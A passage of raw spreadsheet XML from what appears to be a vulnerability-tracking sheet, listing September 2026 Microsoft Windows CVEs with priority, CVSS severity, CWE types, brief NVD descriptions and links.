t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G379" s="5" t="inlineStr" /><c r="H379" s="5" t="n"><v>0.005</v></c><c r="I379" s="5" t="inlineStr" /><c r="J379" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K379" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L379" s="5" t="inlineStr" /><c r="M379" s="5" t="inlineStr" /><c r="N379" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O379" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P379" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q379" s="5" t="inlineStr" /><c r="R379" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S379" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t></is></c><c r="T379" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69412</t></is></c></row><row r="380"><c r="A380" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B380" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C380" s="5" t="inlineStr"><is><t>CVE-2026-69418</t></is></c><c r="D380" s="5" t="n"><v>8</v></c><c r="E380" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F380" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G380" s="5" t="inlineStr" /><c r="H380" s="5" t="n"><v>0.007</v></c><c r="I380" s="5" t="inlineStr" /><c r="J380" s="5" t="inlineStr" /><c r="K380" s="5" t="inlineStr" /><c r="L380" s="5" t="inlineStr" /><c r="M380" s="5" t="inlineStr" /><c r="N380" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O380" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P380" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q380" s="5" t="inlineStr" /><c r="R380" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S380" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Volume Manager Driver allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T380" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69418</t></is></c></row><row r="381"><c r="A381" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B381" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C381" s="5" t="inlineStr"><is><t>CVE-2026-69423</t></is></c><c r="D381" s="5" t="n"><v>8</v></c><c r="E381" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F381" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G381" s="5" t="inlineStr" /><c r="H381" s="5" t="n"><v>0.007</v></c><c r="I381" s="5" t="inlineStr" /><c r="J381" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K38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81" s="5" t="inlineStr" /><c r="M381" s="5" t="inlineStr" /><c r="N381" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O381" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P381" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q381" s="5" t="inlineStr" /><c r="R381" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S381" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows USB Video Driver allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T381" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69423</t></is></c></row><row r="382"><c r="A382" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B382" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C382" s="5" t="inlineStr"><is><t>CVE-2026-69427</t></is></c><c r="D382" s="5" t="n"><v>8</v></c><c r="E382" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F382" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G382" s="5" t="inlineStr" /><c r="H382" s="5" t="n"><v>0.007</v></c><c r="I382" s="5" t="inlineStr" /><c r="J382" s="5" t="inlineStr" /><c r="K382" s="5" t="inlineStr" /><c r="L382" s="5" t="inlineStr" /><c r="M382" s="5" t="inlineStr" /><c r="N382" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O382" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P382" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q382" s="5" t="inlineStr" /><c r="R382" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S382" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows VOLSNAP.SYS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T382" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69427</t></is></c></row><row r="383"><c r="A383" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B383" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C383" s="5" t="inlineStr"><is><t>CVE-2026-69458</t></is></c><c r="D383" s="5" t="n"><v>8</v></c><c r="E383" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F383" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G383" s="5" t="inlineStr" /><c r="H383" s="5" t="n"><v>0.007</v></c><c r="I383" s="5" t="inlineStr" /><c r="J383" s="5" t="inlineStr" /><c r="K383" s="5" t="inlineStr" /><c r="L383" s="5" t="inlineStr" /><c r="M383" s="5" t="inlineStr" /><c r="N383" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O383" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P383" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q383" s="5" t="inlineStr" /><c r="R383" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S383" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows BitLocker allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T383" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69458</t></is></c></row><row r="384"><c r="A384" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B384" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C384" s="5" t="inlineStr"><is><t>CVE-2026-69462</t></is></c><c r="D384" s="5" t="n"><v>8</v></c><c r="E384" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F384" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G384" s="5" t="inlineStr" /><c r="H384" s="5" t="n"><v>0.007</v></c><c r="I384" s="5" t="inlineStr" /><c r="J384" s="5" t="inlineStr" /><c r="K384" s="5" t="inlineStr" /><c r="L384" s="5" t="inlineStr" /><c r="M384" s="5" t="inlineStr" /><c r="N384" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O384" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P384" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q384" s="5" t="inlineStr" /><c r="R384" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S384" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T384" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69462</t></is></c></row><row r="385"><c r="A385" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B385" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C385" s="5" t="inlineStr"><is><t>CVE-2026-69481</t></is></c><c r="D385" s="5" t="n"><v>8</v></c><c r="E385" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F385" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G385" s="5" t="inlineStr" /><c r="H385" s="5" t="n"><v>0.007</v></c><c r="I385" s="5" t="inlineStr" /><c r="J385" s="5" t="inlineStr" /><c r="K385" s="5" t="inlineStr" /><c r="L385" s="5" t="inlineStr" /><c r="M385" s="5" t="inlineStr" /><c r="N385" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O385" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P385" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q385" s="5" t="inlineStr" /><c r="R385" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S385" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Enterprise App Management allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T385" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69481</t></is></c></row><row r="386"><c r="A386" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B386" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C386" s="5" t="inlineStr"><is><t>CVE-2026-69503</t></is></c><c r="D386" s="5" t="n"><v>8</v></c><c r="E386" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F386" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G386" s="5" t="inlineStr" /><c r="H386" s="5" t="n"><v>0.008</v></c><c r="I386" s="5" t="inlineStr" /><c r="J386" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K386"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386" s="5" t="inlineStr" /><c r="M386" s="5" t="inlineStr" /><c r="N386" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O386" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P386" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q386" s="5" t="inlineStr" /><c r="R386" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S386" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows USB Driver allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T386" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69503</t></is></c></row><row r="387"><c r="A387" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B387" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C387" s="5" t="inlineStr"><is><t>CVE-2026-69505</t></is></c><c r="D387" s="5" t="n"><v>8</v></c><c r="E387" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F387" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G387" s="5" t="inlineStr" /><c r="H387" s="5" t="n"><v>0.008</v></c><c r="I387" s="5" t="inlineStr" /><c r="J387" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K38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87" s="5" t="inlineStr" /><c r="M387" s="5" t="inlineStr" /><c r="N387" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O387" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P387" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q387" s="5" t="inlineStr" /><c r="R387" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S387" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T387" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69505</t></is></c></row><row r="388"><c r="A388" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B388" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C388" s="5" t="inlineStr"><is><t>CVE-2026-69512</t></is></c><c r="D388" s="5" t="n"><v>8</v></c><c r="E388" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F388" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G388" s="5" t="inlineStr" /><c r="H388" s="5" t="n"><v>0.008</v></c><c r="I388" s="5" t="inlineStr" /><c r="J388" s="5" t="inlineStr" /><c r="K388" s="5" t="inlineStr" /><c r="L388" s="5" t="inlineStr" /><c r="M388" s="5" t="inlineStr" /><c r="N388" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O388" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P388" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q388" s="5" t="inlineStr" /><c r="R388" s="5" t="inlineStr"><is><t>CWE-122, CWE-197</t></is></c><c r="S388" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Spaceport.sys allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T388" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69512</t></is></c></row><row r="389"><c r="A389" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B389" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C389" s="5" t="inlineStr"><is><t>CVE-2026-69619</t></is></c><c r="D389" s="5" t="n"><v>8</v></c><c r="E389" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F389" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G389" s="5" t="inlineStr" /><c r="H389" s="5" t="n"><v>0.008</v></c><c r="I389" s="5" t="inlineStr" /><c r="J389" s="5" t="inlineStr" /><c r="K389" s="5" t="inlineStr" /><c r="L389" s="5" t="inlineStr" /><c r="M389" s="5" t="inlineStr" /><c r="N389" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O389" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P389" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q389" s="5" t="inlineStr" /><c r="R389" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S389" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows exFAT File System allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T389" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69619</t></is></c></row><row r="390"><c r="A390" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B390" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C390" s="5" t="inlineStr"><is><t>CVE-2026-69623</t></is></c><c r="D390" s="5" t="n"><v>8</v></c><c r="E390" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F390" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G390" s="5" t="inlineStr" /><c r="H390" s="5" t="n"><v>0.008999999999999999</v></c><c r="I390" s="5" t="inlineStr" /><c r="J390" s="5" t="inlineStr" /><c r="K390" s="5" t="inlineStr" /><c r="L390" s="5" t="inlineStr" /><c r="M390" s="5" t="inlineStr" /><c r="N390" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O390" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P390" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q390" s="5" t="inlineStr" /><c r="R390" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S390" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T390" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69623</t></is></c></row><row r="391"><c r="A391" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B391" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C391" s="5" t="inlineStr"><is><t>CVE-2026-69625</t></is></c><c r="D391" s="5" t="n"><v>8</v></c><c r="E391" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F391" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G391" s="5" t="inlineStr" /><c r="H391" s="5" t="n"><v>0.007</v></c><c r="I391" s="5" t="inlineStr" /><c r="J391" s="5" t="inlineStr" /><c r="K391" s="5" t="inlineStr" /><c r="L391" s="5" t="inlineStr" /><c r="M391" s="5" t="inlineStr" /><c r="N391" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O391" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P391" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q391" s="5" t="inlineStr" /><c r="R391" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S391" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T391" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69625</t></is></c></row><row r="392"><c r="A392" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B392" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C392" s="5" t="inlineStr"><is><t>CVE-2026-69643</t></is></c><c r="D392" s="5" t="n"><v>8</v></c><c r="E392" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F392" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G392" s="5" t="inlineStr" /><c r="H392" s="5" t="n"><v>0.008</v></c><c r="I392" s="5" t="inlineStr" /><c r="J392" s="5" t="inlineStr" /><c r="K392" s="5" t="inlineStr" /><c r="L392" s="5" t="inlineStr" /><c r="M392" s="5" t="inlineStr" /><c r="N392" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O392" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P392" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q392" s="5" t="inlineStr" /><c r="R392" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S392" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Spaceport.sys allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T392" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69643</t></is></c></row><row r="393"><c r="A393" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B393" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C393" s="5" t="inlineStr"><is><t>CVE-2026-69681</t></is></c><c r="D393" s="5" t="n"><v>8</v></c><c r="E393" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F393" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G393" s="5" t="inlineStr" /><c r="H393" s="5" t="n"><v>0.008</v></c><c r="I393" s="5" t="inlineStr" /><c r="J393" s="5" t="inlineStr" /><c r="K393" s="5" t="inlineStr" /><c r="L393" s="5" t="inlineStr" /><c r="M393" s="5" t="inlineStr" /><c r="N393" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O393" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P393" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q393" s="5" t="inlineStr" /><c r="R393" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S393" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T393" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69681</t></is></c></row><row r="394"><c r="A394" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B394" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C394" s="5" t="inlineStr"><is><t>CVE-2026-69689</t></is></c><c r="D394" s="5" t="n"><v>8</v></c><c r="E394" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F394" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G394" s="5" t="inlineStr" /><c r="H394" s="5" t="n"><v>0.008</v></c><c r="I394" s="5" t="inlineStr" /><c r="J394" s="5" t="inlineStr" /><c r="K394" s="5" t="inlineStr" /><c r="L394" s="5" t="inlineStr" /><c r="M394" s="5" t="inlineStr" /><c r="N394" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O394" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P394" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q394" s="5" t="inlineStr" /><c r="R394" s="5" t="inlineStr"><is><t>CWE-121, CWE-125</t></is></c><c r="S394" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T394" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69689</t></is></c></row><row r="395"><c r="A395" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B395" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C395" s="5" t="inlineStr"><is><t>CVE-2026-69714</t></is></c><c r="D395" s="5" t="n"><v>8</v></c><c r="E395" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F395" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G395" s="5" t="inlineStr" /><c r="H395" s="5" t="n"><v>0.008</v></c><c r="I395" s="5" t="inlineStr" /><c r="J395" s="5" t="inlineStr" /><c r="K395" s="5" t="inlineStr" /><c r="L395" s="5" t="inlineStr" /><c r="M395" s="5" t="inlineStr" /><c r="N395" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O395" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P395" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q395" s="5" t="inlineStr" /><c r="R395" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S395" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Device Association Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T395" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69714</t></is></c></row><row r="396"><c r="A396" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B396" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C396" s="5" t="inlineStr"><is><t>CVE-2026-69717</t></is></c><c r="D396" s="5" t="n"><v>8</v></c><c r="E396" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F396" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G396" s="5" t="inlineStr" /><c r="H396" s="5" t="n"><v>0.007</v></c><c r="I396" s="5" t="inlineStr" /><c r="J396" s="5" t="inlineStr" /><c r="K396" s="5" t="inlineStr" /><c r="L396" s="5" t="inlineStr" /><c r="M396" s="5" t="inlineStr" /><c r="N396" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O396" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P396" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q396" s="5" t="inlineStr" /><c r="R396" s="5" t="inlineStr"><is><t>CWE-125, CWE-822, CWE-843</t></is></c><c r="S396" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Group Policy allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T396" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69717</t></is></c></row><row r="397"><c r="A397" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B397" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C397" s="5" t="inlineStr"><is><t>CVE-2026-69727</t></is></c><c r="D397" s="5" t="n"><v>8</v></c><c r="E397" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F397" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G397" s="5" t="inlineStr" /><c r="H397" s="5" t="n"><v>0.007</v></c><c r="I397" s="5" t="inlineStr" /><c r="J397" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K39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97" s="5" t="inlineStr" /><c r="M397" s="5" t="inlineStr" /><c r="N397" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O397" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P397" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q397" s="5" t="inlineStr" /><c r="R397" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S397" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T397" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69727</t></is></c></row><row r="398"><c r="A398" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B398" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C398" s="5" t="inlineStr"><is><t>CVE-2026-69762</t></is></c><c r="D398" s="5" t="n"><v>8</v></c><c r="E398" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F398" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G398" s="5" t="inlineStr" /><c r="H398" s="5" t="n"><v>0.007</v></c><c r="I398" s="5" t="inlineStr" /><c r="J398" s="5" t="inlineStr" /><c r="K398" s="5" t="inlineStr" /><c r="L398" s="5" t="inlineStr" /><c r="M398" s="5" t="inlineStr" /><c r="N398" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O398" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P398" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q398" s="5" t="inlineStr" /><c r="R398" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S398" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T398" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69762</t></is></c></row><row r="399"><c r="A399" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B399" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C399" s="5" t="inlineStr"><is><t>CVE-2026-69773</t></is></c><c r="D399" s="5" t="n"><v>8</v></c><c r="E399" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F399" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G399" s="5" t="inlineStr" /><c r="H399" s="5" t="n"><v>0.007</v></c><c r="I399" s="5" t="inlineStr" /><c r="J399" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K39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99" s="5" t="inlineStr" /><c r="M399" s="5" t="inlineStr" /><c r="N399" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O399" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P399" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q399" s="5" t="inlineStr" /><c r="R399" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S399" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T399" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69773</t></is></c></row><row r="400"><c r="A400" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B400" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C400" s="5" t="inlineStr"><is><t>CVE-2026-69777</t></is></c><c r="D400" s="5" t="n"><v>8</v></c><c r="E400" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F400" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G400" s="5" t="inlineStr" /><c r="H400" s="5" t="n"><v>0.005</v></c><c r="I400" s="5" t="inlineStr" /><c r="J400" s="5" t="inlineStr" /><c r="K400" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L400" s="5" t="inlineStr" /><c r="M400" s="5" t="inlineStr" /><c r="N400" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O400" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P400" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q400" s="5" t="inlineStr" /><c r="R400" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S400" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows DHCP Client allows an authorized attacker to elevate privileges over an adjacent network.</t></is></c><c r="T400" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69777</t></is></c></row><row r="401"><c r="A401" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B401" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C401" s="5" t="inlineStr"><is><t>CVE-2026-69807</t></is></c><c r="D401" s="5" t="n"><v>8</v></c><c r="E401" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F401" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G401" s="5" t="inlineStr" /><c r="H401" s="5" t="n"><v>0.008999999999999999</v></c><c r="I401" s="5" t="inlineStr" /><c r="J401" s="5" t="inlineStr" /><c r="K401" s="5" t="inlineStr" /><c r="L401" s="5" t="inlineStr" /><c r="M401" s="5" t="inlineStr" /><c r="N401" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O401" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P401" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q401" s="5" t="inlineStr" /><c r="R401" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S401" s="5" t="inlineStr"><is><t>Improper limitation of a pathname to a restricted directory ('path traversal') in Windows PowerShell allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T401" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69807</t></is></c></row><row r="402"><c r="A402" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B402" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C402" s="5" t="inlineStr"><is><t>CVE-2026-69826</t></is></c><c r="D402" s="5" t="n"><v>8</v></c><c r="E402" s="5" 